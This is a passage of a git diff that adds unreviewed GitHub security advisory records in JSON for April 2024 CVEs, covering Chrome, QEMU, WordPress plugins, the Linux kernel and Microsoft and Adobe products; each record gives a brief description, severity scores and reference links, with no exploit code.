"2024-04-09T17:15:50Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-mgwp-p2g9-cmqr/GHSA-mgwp-p2g9-cmqr.json b/advisories/unreviewed/2024/04/GHSA-mgwp-p2g9-cmqr/GHSA-mgwp-p2g9-cmqr.json new file mode 100644 index 00000000000..4b0f82833ea --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-mgwp-p2g9-cmqr/GHSA-mgwp-p2g9-cmqr.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mgwp-p2g9-cmqr", + "modified": "2024-04-08T09:31:13Z", + "published": "2024-04-08T09:31:13Z", + "aliases": [ + "CVE-2023-52551" + ], + "details": "Vulnerability of data verification errors in the kernel module.\nImpact: Successful exploitation of this vulnerability may affect service confidentiality.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52551" + }, + { + "type": "WEB", + "url": "https://consumer.huawei.com/en/support/bulletin/2024/3" + }, + { + "type": "WEB", + "url": "https://device.harmonyos.com/en/docs/security/update/security-bulletins-202403-0000001667644725" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T09:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-mh2p-2x66-3hr4/GHSA-mh2p-2x66-3hr4.json b/advisories/unreviewed/2024/04/GHSA-mh2p-2x66-3hr4/GHSA-mh2p-2x66-3hr4.json new file mode 100644 index 00000000000..77be4f9b394 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-mh2p-2x66-3hr4/GHSA-mh2p-2x66-3hr4.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mh2p-2x66-3hr4", + "modified": "2024-04-06T15:30:28Z", + "published": "2024-04-06T15:30:28Z", + "aliases": [ + "CVE-2024-3159" + ], + "details": "Out of bounds memory access in V8 in Google Chrome prior to 123.0.6312.105 allowed a remote attacker to perform arbitrary read/write via a crafted HTML page. (Chromium security severity: High)", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3159" + }, + { + "type": "WEB", + "url": "https://chromereleases.googleblog.com/2024/04/stable-channel-update-for-desktop.html" + }, + { + "type": "WEB", + "url": "https://issues.chromium.org/issues/330760873" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-06T15:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-mhm4-4xwv-3x8f/GHSA-mhm4-4xwv-3x8f.json b/advisories/unreviewed/2024/04/GHSA-mhm4-4xwv-3x8f/GHSA-mhm4-4xwv-3x8f.json new file mode 100644 index 00000000000..3bdc430c023 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-mhm4-4xwv-3x8f/GHSA-mhm4-4xwv-3x8f.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mhm4-4xwv-3x8f", + "modified": "2024-04-08T12:30:32Z", + "published": "2024-04-08T12:30:32Z", + "aliases": [ + "CVE-2023-52385" + ], + "details": "Out-of-bounds write vulnerability in the RSMC module.\nImpact: Successful exploitation of this vulnerability will affect availability.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52385" + }, + { + "type": "WEB", + "url": "https://consumer.huawei.com/en/support/bulletin/2024/3" + }, + { + "type": "WEB", + "url": "https://https://device.harmonyos.com/en/docs/security/update/security-bulletins-202403-0000001667644725" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T10:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-mj6g-39xm-96q9/GHSA-mj6g-39xm-96q9.json b/advisories/unreviewed/2024/04/GHSA-mj6g-39xm-96q9/GHSA-mj6g-39xm-96q9.json new file mode 100644 index 00000000000..4dfa3cd69c1 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-mj6g-39xm-96q9/GHSA-mj6g-39xm-96q9.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mj6g-39xm-96q9", + "modified": "2024-04-09T15:30:36Z", + "published": "2024-04-09T00:30:41Z", + "aliases": [ + "CVE-2024-23584" + ], + "details": "The NMAP Importer service​ may expose data store credentials to authorized users of the Windows Registry.\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23584" + }, + { + "type": "WEB", + "url": "https://support.hcltechsw.com/csm?id=kb_article&sysparm_article=KB0112264" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T23:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-mjp5-p6j6-39pw/GHSA-mjp5-p6j6-39pw.json b/advisories/unreviewed/2024/04/GHSA-mjp5-p6j6-39pw/GHSA-mjp5-p6j6-39pw.json new file mode 100644 index 00000000000..b56081c5510 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-mjp5-p6j6-39pw/GHSA-mjp5-p6j6-39pw.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mjp5-p6j6-39pw", + "modified": "2024-04-09T21:31:58Z", + "published": "2024-04-09T21:31:58Z", + "aliases": [ + "CVE-2024-1637" + ], + "details": "The 360 Javascript Viewer plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check and nonce exposure on several AJAX actions in all versions up to, and including, 1.7.12. This makes it possible for authenticated attackers, with subscriber access or higher, to update plugin settings.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1637" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/360deg-javascript-viewer/trunk/admin/pages/class-jsv-360-admin_page_abstract.php#L42" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3047449/360deg-javascript-viewer/trunk/admin/pages/class-jsv-360-admin_page_abstract.php?contextall=1&old=3015478&old_path=%2F360deg-javascript-viewer%2Ftrunk%2Fadmin%2Fpages%2Fclass-jsv-360-admin_page_abstract.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/1ba33c84-5198-4c77-8995-d0a315d68990?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:18Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-mpmm-hvxp-c3m8/GHSA-mpmm-hvxp-c3m8.json b/advisories/unreviewed/2024/04/GHSA-mpmm-hvxp-c3m8/GHSA-mpmm-hvxp-c3m8.json new file mode 100644 index 00000000000..8a43b76d3b0 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-mpmm-hvxp-c3m8/GHSA-mpmm-hvxp-c3m8.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mpmm-hvxp-c3m8", + "modified": "2024-04-08T18:30:48Z", + "published": "2024-04-08T18:30:47Z", + "aliases": [ + "CVE-2024-3456" + ], + "details": "A vulnerability was found in Netentsec NS-ASG Application Security Gateway 6.3. It has been rated as critical. Affected by this issue is some unknown functionality of the file /admin/config_Anticrack.php. The manipulation of the argument GroupId leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259712.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3456" + }, + { + "type": "WEB", + "url": "https://github.com/flyyue2001/cve/blob/main/NS-ASG-sql-config_Anticrack.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259712" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259712" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.312183" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T17:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-mq6j-35mg-9rj6/GHSA-mq6j-35mg-9rj6.json b/advisories/unreviewed/2024/04/GHSA-mq6j-35mg-9rj6/GHSA-mq6j-35mg-9rj6.json new file mode 100644 index 00000000000..a0aa05112d9 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-mq6j-35mg-9rj6/GHSA-mq6j-35mg-9rj6.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mq6j-35mg-9rj6", + "modified": "2024-04-08T03:30:52Z", + "published": "2024-04-08T03:30:52Z", + "aliases": [ + "CVE-2023-52533" + ], + "details": "In modem-ps-nas-ngmm, there is a possible undefined behavior due to incorrect error handling. This could lead to remote information disclosure no additional execution privileges needed", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52533" + }, + { + "type": "WEB", + "url": "https://www.unisoc.com/en_us/secy/announcementDetail/1777148475750809602" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T03:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-mqq7-33jf-2x53/GHSA-mqq7-33jf-2x53.json b/advisories/unreviewed/2024/04/GHSA-mqq7-33jf-2x53/GHSA-mqq7-33jf-2x53.json new file mode 100644 index 00000000000..999d9820038 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-mqq7-33jf-2x53/GHSA-mqq7-33jf-2x53.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mqq7-33jf-2x53", + "modified": "2024-04-10T15:30:40Z", + "published": "2024-04-10T15:30:40Z", + "aliases": [ + "CVE-2024-3567" + ], + "details": "A flaw was found in QEMU. An assertion failure was present in the update_sctp_checksum() function in hw/net/net_tx_pkt.c when trying to calculate the checksum of a short-sized fragmented packet. This flaw allows a malicious guest to crash QEMU and cause a denial of service condition.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3567" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2024-3567" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2274339" + }, + { + "type": "WEB", + "url": "https://gitlab.com/qemu-project/qemu/-/issues/2273" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-617" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T15:16:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-mqr2-w7wj-jjgr/GHSA-mqr2-w7wj-jjgr.json b/advisories/unreviewed/2024/04/GHSA-mqr2-w7wj-jjgr/GHSA-mqr2-w7wj-jjgr.json new file mode 100644 index 00000000000..e729f4bc5a3 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-mqr2-w7wj-jjgr/GHSA-mqr2-w7wj-jjgr.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mqr2-w7wj-jjgr", + "modified": "2024-04-10T15:30:39Z", + "published": "2024-04-10T15:30:39Z", + "aliases": [ + "CVE-2024-21507" + ], + "details": "Versions of the package mysql2 before 3.9.3 are vulnerable to Improper Input Validation through the keyFromFields function, resulting in cache poisoning. An attacker can inject a colon (:) character within a value of the attacker-crafted key.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21507" + }, + { + "type": "WEB", + "url": "https://github.com/sidorares/node-mysql2/pull/2424" + }, + { + "type": "WEB", + "url": "https://github.com/sidorares/node-mysql2/commit/0d54b0ca6498c823098426038162ef10df02c818" + }, + { + "type": "WEB", + "url": "https://blog.slonser.info/posts/mysql2-attacker-configuration" + }, + { + "type": "WEB", + "url": "https://security.snyk.io/vuln/SNYK-JS-MYSQL2-6591300" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T05:15:48Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-mvf3-qj92-4c7r/GHSA-mvf3-qj92-4c7r.json b/advisories/unreviewed/2024/04/GHSA-mvf3-qj92-4c7r/GHSA-mvf3-qj92-4c7r.json new file mode 100644 index 00000000000..2f837128ff4 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-mvf3-qj92-4c7r/GHSA-mvf3-qj92-4c7r.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mvf3-qj92-4c7r", + "modified": "2024-04-09T15:30:36Z", + "published": "2024-04-09T15:30:36Z", + "aliases": [ + "CVE-2024-2223" + ], + "details": "An Incorrect Regular Expression vulnerability in Bitdefender GravityZone Update Server allows an attacker to cause a Server Side Request Forgery and reconfigure the relay. This issue affects the following products that include the vulnerable component: \n\nBitdefender Endpoint Security for Linux version 7.0.5.200089\nBitdefender Endpoint Security for  Windows version 7.9.9.380\nGravityZone Control Center (On Premises) version 6.36.1\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2223" + }, + { + "type": "WEB", + "url": "https://www.bitdefender.com/support/security-advisories/incorrect-regular-expression-in-gravityzone-update-server-va-11465" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-185" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T13:15:33Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-mvmm-9v72-f3h4/GHSA-mvmm-9v72-f3h4.json b/advisories/unreviewed/2024/04/GHSA-mvmm-9v72-f3h4/GHSA-mvmm-9v72-f3h4.json new file mode 100644 index 00000000000..498f3680eef --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-mvmm-9v72-f3h4/GHSA-mvmm-9v72-f3h4.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mvmm-9v72-f3h4", + "modified": "2024-04-10T15:30:38Z", + "published": "2024-04-10T15:30:38Z", + "aliases": [ + "CVE-2024-30718" + ], + "details": "An issue was discovered in ROS2 Dashing Diademata in ROS_VERSION=2 and ROS_PYTHON_VERSION=3, allows remote attackers to execute arbitrary code via packages or nodes within the ROS2 system.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30718" + }, + { + "type": "WEB", + "url": "https://github.com/yashpatelphd/CVE-2024-30718" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T03:15:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-mw2h-9mqr-794q/GHSA-mw2h-9mqr-794q.json b/advisories/unreviewed/2024/04/GHSA-mw2h-9mqr-794q/GHSA-mw2h-9mqr-794q.json new file mode 100644 index 00000000000..df551c0514b --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-mw2h-9mqr-794q/GHSA-mw2h-9mqr-794q.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mw2h-9mqr-794q", + "modified": "2024-04-09T18:30:26Z", + "published": "2024-04-09T18:30:26Z", + "aliases": [ + "CVE-2024-26241" + ], + "details": "Win32k Elevation of Privilege Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26241" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26241" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-416" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:45Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-mw3g-jr7f-3gg4/GHSA-mw3g-jr7f-3gg4.json b/advisories/unreviewed/2024/04/GHSA-mw3g-jr7f-3gg4/GHSA-mw3g-jr7f-3gg4.json new file mode 100644 index 00000000000..7eed5cb4fb3 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-mw3g-jr7f-3gg4/GHSA-mw3g-jr7f-3gg4.json @@ -0,0 +1,67 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mw3g-jr7f-3gg4", + "modified": "2024-04-10T15:30:40Z", + "published": "2024-04-10T15:30:40Z", + "aliases": [ + "CVE-2024-26816" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nx86, relocs: Ignore relocations in .notes section\n\nWhen building with CONFIG_XEN_PV=y, .text symbols are emitted into\nthe .notes section so that Xen can find the \"startup_xen\" entry point.\nThis information is used prior to booting the kernel, so relocations\nare not useful. In fact, performing relocations against the .notes\nsection means that the KASLR base is exposed since /sys/kernel/notes\nis world-readable.\n\nTo avoid leaking the KASLR base without breaking unprivileged tools that\nare expecting to read /sys/kernel/notes, skip performing relocations in\nthe .notes section. The values readable in .notes are then identical to\nthose found in System.map.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26816" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/13edb509abc91c72152a11baaf0e7c060a312e03" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/47635b112a64b7b208224962471e7e42f110e723" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/52018aa146e3cf76569a9b1e6e49a2b7c8d4a088" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/5cb59db49c9c0fccfd33b2209af4f7ae3c6ddf40" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/a4e7ff1a74274e59a2de9bb57236542aa990d20a" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/aaa8736370db1a78f0e8434344a484f9fd20be3b" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/ae7079238f6faf1b94accfccf334e98b46a0c0aa" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/af2a9f98d884205145fd155304a6955822ccca1c" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/c7cff9780297d55d97ad068b68b703cfe53ef9af" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T14:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-mw9v-x4m4-66v4/GHSA-mw9v-x4m4-66v4.json b/advisories/unreviewed/2024/04/GHSA-mw9v-x4m4-66v4/GHSA-mw9v-x4m4-66v4.json new file mode 100644 index 00000000000..95ea0666f43 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-mw9v-x4m4-66v4/GHSA-mw9v-x4m4-66v4.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mw9v-x4m4-66v4", + "modified": "2024-04-10T15:30:39Z", + "published": "2024-04-10T15:30:39Z", + "aliases": [ + "CVE-2024-20737" + ], + "details": "After Effects versions 24.1, 23.6.2 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20737" + }, + { + "type": "WEB", + "url": "https://helpx.adobe.com/security/products/after_effects/apsb24-09.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-125" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T09:15:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-mwrm-5xj9-hg36/GHSA-mwrm-5xj9-hg36.json b/advisories/unreviewed/2024/04/GHSA-mwrm-5xj9-hg36/GHSA-mwrm-5xj9-hg36.json new file mode 100644 index 00000000000..80a60170168 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-mwrm-5xj9-hg36/GHSA-mwrm-5xj9-hg36.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mwrm-5xj9-hg36", + "modified": "2024-04-10T15:30:40Z", + "published": "2024-04-10T15:30:40Z", + "aliases": [ + "CVE-2024-20766" + ], + "details": "InDesign Desktop versions 18.5.1, 19.2 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20766" + }, + { + "type": "WEB", + "url": "https://helpx.adobe.com/security/products/indesign/apsb24-20.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-125" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T13:51:37Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-mwxw-jp9c-r89r/GHSA-mwxw-jp9c-r89r.json b/advisories/unreviewed/2024/04/GHSA-mwxw-jp9c-r89r/GHSA-mwxw-jp9c-r89r.json new file mode 100644 index 00000000000..713768929ec --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-mwxw-jp9c-r89r/GHSA-mwxw-jp9c-r89r.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mwxw-jp9c-r89r", + "modified": "2024-04-09T18:30:27Z", + "published": "2024-04-09T18:30:27Z", + "aliases": [ + "CVE-2024-28932" + ], + "details": "Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28932" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-28932" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-122" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:54Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-mx7w-qx25-cc3c/GHSA-mx7w-qx25-cc3c.json b/advisories/unreviewed/2024/04/GHSA-mx7w-qx25-cc3c/GHSA-mx7w-qx25-cc3c.json new file mode 100644 index 00000000000..075b9fb779c --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-mx7w-qx25-cc3c/GHSA-mx7w-qx25-cc3c.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mx7w-qx25-cc3c", + "modified": "2024-04-07T18:30:30Z", + "published": "2024-04-07T18:30:30Z", + "aliases": [ + "CVE-2024-31291" + ], + "details": "Authorization Bypass Through User-Controlled Key vulnerability in Metagauss ProfileGrid.This issue affects ProfileGrid : from n/a through 5.7.6.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31291" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/profilegrid-user-profiles-groups-and-communities/wordpress-profilegrid-plugin-5-7-6-idor-on-friend-request-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-639" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-07T18:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-mxcm-w7fm-9qr2/GHSA-mxcm-w7fm-9qr2.json b/advisories/unreviewed/2024/04/GHSA-mxcm-w7fm-9qr2/GHSA-mxcm-w7fm-9qr2.json new file mode 100644 index 00000000000..daae68c79a9 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-mxcm-w7fm-9qr2/GHSA-mxcm-w7fm-9qr2.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mxcm-w7fm-9qr2", + "modified": "2024-04-09T21:32:00Z", + "published": "2024-04-09T21:32:00Z", + "aliases": [ + "CVE-2024-3545" + ], + "details": "Improper permission handling in the vault offline cache feature in Devolutions Remote Desktop Manager 2024.1.20 and earlier on windows and Devolutions Server 2024.1.8 and earlier allows an attacker to access sensitive informations contained in the offline cache file by gaining access to a computer where the software is installed even though the offline mode is disabled.\n\n", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3545" + }, + { + "type": "WEB", + "url": "https://devolutions.net/security/advisories/DEVO-2024-0006" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:41Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-mxpv-g3w9-rggw/GHSA-mxpv-g3w9-rggw.json b/advisories/unreviewed/2024/04/GHSA-mxpv-g3w9-rggw/GHSA-mxpv-g3w9-rggw.json new file mode 100644 index 00000000000..d68d2800940 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-mxpv-g3w9-rggw/GHSA-mxpv-g3w9-rggw.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mxpv-g3w9-rggw", + "modified": "2024-04-09T18:30:25Z", + "published": "2024-04-09T18:30:25Z", + "aliases": [ + "CVE-2024-26216" + ], + "details": "Windows File Server Resource Management Service Elevation of Privilege Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26216" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26216" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-59" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:40Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-p25p-77fc-q58p/GHSA-p25p-77fc-q58p.json b/advisories/unreviewed/2024/04/GHSA-p25p-77fc-q58p/GHSA-p25p-77fc-q58p.json new file mode 100644 index 00000000000..e4ac8f85a3d --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-p25p-77fc-q58p/GHSA-p25p-77fc-q58p.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p25p-77fc-q58p", + "modified": "2024-04-09T21:31:59Z", + "published": "2024-04-09T21:31:59Z", + "aliases": [ + "CVE-2024-2039" + ], + "details": "The Stackable – Page Builder Gutenberg Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Post(v2) block title tag in all versions up to, and including, 